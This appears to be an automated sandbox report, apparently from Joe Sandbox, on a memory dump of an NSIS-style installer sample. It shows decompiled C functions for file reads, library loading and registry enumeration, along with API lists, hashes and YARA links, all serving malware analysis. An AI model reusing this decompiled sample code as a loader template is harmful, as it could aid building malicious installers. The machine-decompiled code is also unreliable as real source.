                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x0040731a
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407237
                                                                                                                                                                                                                            0x00407239
                                                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                                                            0x0040723f
                                                                                                                                                                                                                            0x00407242
                                                                                                                                                                                                                            0x00407244
                                                                                                                                                                                                                            0x00407247
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x00407250
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071e0
                                                                                                                                                                                                                            0x004071e2
                                                                                                                                                                                                                            0x004071e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f48
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00406f4e
                                                                                                                                                                                                                            0x00406f51
                                                                                                                                                                                                                            0x00406f54
                                                                                                                                                                                                                            0x00406f57
                                                                                                                                                                                                                            0x00406f5a
                                                                                                                                                                                                                            0x00406f5d
                                                                                                                                                                                                                            0x00406f60
                                                                                                                                                                                                                            0x00406f62
                                                                                                                                                                                                                            0x00406f65
                                                                                                                                                                                                                            0x00406f68
                                                                                                                                                                                                                            0x00406f6b
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070df
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073cb

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                                                                                                                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00403479(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x66cde
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0x79b3d
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						_t19 =  *0x420f00; // 0x5cfce
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40d704
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x66cde
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                                                                                                                                                                                            0x0040347c
                                                                                                                                                                                                                            0x00403489
                                                                                                                                                                                                                            0x0040349c
                                                                                                                                                                                                                            0x004034a1
                                                                                                                                                                                                                            0x004035d1
                                                                                                                                                                                                                            0x004035d3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035d9
                                                                                                                                                                                                                            0x004034ad
                                                                                                                                                                                                                            0x004034c0
                                                                                                                                                                                                                            0x004034c6
                                                                                                                                                                                                                            0x004034cc
                                                                                                                                                                                                                            0x004034d7
                                                                                                                                                                                                                            0x004034d7
                                                                                                                                                                                                                            0x004034dc
                                                                                                                                                                                                                            0x004034e1
                                                                                                                                                                                                                            0x004034e9
                                                                                                                                                                                                                            0x004034eb
                                                                                                                                                                                                                            0x004034eb
                                                                                                                                                                                                                            0x004034f4
                                                                                                                                                                                                                            0x004034fb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403501
                                                                                                                                                                                                                            0x00403507
                                                                                                                                                                                                                            0x0040350d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403513
                                                                                                                                                                                                                            0x00403519
                                                                                                                                                                                                                            0x00403523
                                                                                                                                                                                                                            0x00403539
                                                                                                                                                                                                                            0x0040353e
                                                                                                                                                                                                                            0x00403543
                                                                                                                                                                                                                            0x00403549
                                                                                                                                                                                                                            0x0040354f
                                                                                                                                                                                                                            0x00403559
                                                                                                                                                                                                                            0x00403560
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403562
                                                                                                                                                                                                                            0x00403568
                                                                                                                                                                                                                            0x0040356a
                                                                                                                                                                                                                            0x0040358d
                                                                                                                                                                                                                            0x00403593
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403595
                                                                                                                                                                                                                            0x00403597
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403599
                                                                                                                                                                                                                            0x00403599
                                                                                                                                                                                                                            0x004035ac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035bb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035bb
                                                                                                                                                                                                                            0x00403574
                                                                                                                                                                                                                            0x0040357b
                                                                                                                                                                                                                            0x004035c8
                                                                                                                                                                                                                            0x004035ce
                                                                                                                                                                                                                            0x004035ce
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035ce
                                                                                                                                                                                                                            0x0040357d
                                                                                                                                                                                                                            0x00403583
                                                                                                                                                                                                                            0x00403589
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035cc
                                                                                                                                                                                                                            0x004035cc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035cc
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                                                                                                                                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00066CDE,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer$CountTick
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1092082344-0
                                                                                                                                                                                                                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                                                                                                                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                                                                                            0x004020d8
                                                                                                                                                                                                                            0x004020d8
                                                                                                                                                                                                                            0x004020dd
                                                                                                                                                                                                                            0x004020e4
                                                                                                                                                                                                                            0x004021a3
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x00402c2a
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39
                                                                                                                                                                                                                            0x00402c39
                                                                                                                                                                                                                            0x004020f3
                                                                                                                                                                                                                            0x004020fd
                                                                                                                                                                                                                            0x00402100
                                                                                                                                                                                                                            0x00402110
                                                                                                                                                                                                                            0x00402114
                                                                                                                                                                                                                            0x0040211a
                                                                                                                                                                                                                            0x0040211c
                                                                                                                                                                                                                            0x0040211f
                                                                                                                                                                                                                            0x0040219c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040219c
                                                                                                                                                                                                                            0x00402121
                                                                                                                                                                                                                            0x0040212c
                                                                                                                                                                                                                            0x00402130
                                                                                                                                                                                                                            0x00402170
                                                                                                                                                                                                                            0x00402132
                                                                                                                                                                                                                            0x00402135
                                                                                                                                                                                                                            0x00402138
                                                                                                                                                                                                                            0x00402164
                                                                                                                                                                                                                            0x0040213a
                                                                                                                                                                                                                            0x0040213d
                                                                                                                                                                                                                            0x00402146
                                                                                                                                                                                                                            0x00402148
                                                                                                                                                                                                                            0x00402148
                                                                                                                                                                                                                            0x00402146
                                                                                                                                                                                                                            0x00402138
                                                                                                                                                                                                                            0x00402178
                                                                                                                                                                                                                            0x00402191
                                                                                                                                                                                                                            0x00402191
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402178
                                                                                                                                                                                                                            0x00402103
                                                                                                                                                                                                                            0x0040210b
                                                                                                                                                                                                                            0x0040210e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 334405425-0
                                                                                                                                                                                                                            • Opcode ID: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                                                                                                                                                                                            • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                                                                                                                                                                                            0x0040259e
                                                                                                                                                                                                                            0x0040259e
                                                                                                                                                                                                                            0x0040259e
                                                                                                                                                                                                                            0x004025a3
                                                                                                                                                                                                                            0x004025aa
                                                                                                                                                                                                                            0x004025ac
                                                                                                                                                                                                                            0x004025b4
                                                                                                                                                                                                                            0x004025b7
                                                                                                                                                                                                                            0x004025ba
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x004025c0
                                                                                                                                                                                                                            0x004025c8
                                                                                                                                                                                                                            0x004025cb
                                                                                                                                                                                                                            0x004025e4
                                                                                                                                                                                                                            0x004025ea
                                                                                                                                                                                                                            0x004025ec
                                                                                                                                                                                                                            0x004025ee
                                                                                                                                                                                                                            0x004025ee
                                                                                                                                                                                                                            0x004025cd
                                                                                                                                                                                                                            0x004025d1
                                                                                                                                                                                                                            0x004025d1
                                                                                                                                                                                                                            0x004025f5
                                                                                                                                                                                                                            0x004025fc
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32 ref: 004025E4
                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 397863658-0
                                                                                                                                                                                                                            • Opcode ID: a2874957321bf6034ab335a01143add9f6f6121a8284cc98450072ad0413cc1f
                                                                                                                                                                                                                            • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2874957321bf6034ab335a01143add9f6f6121a8284cc98450072ad0413cc1f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
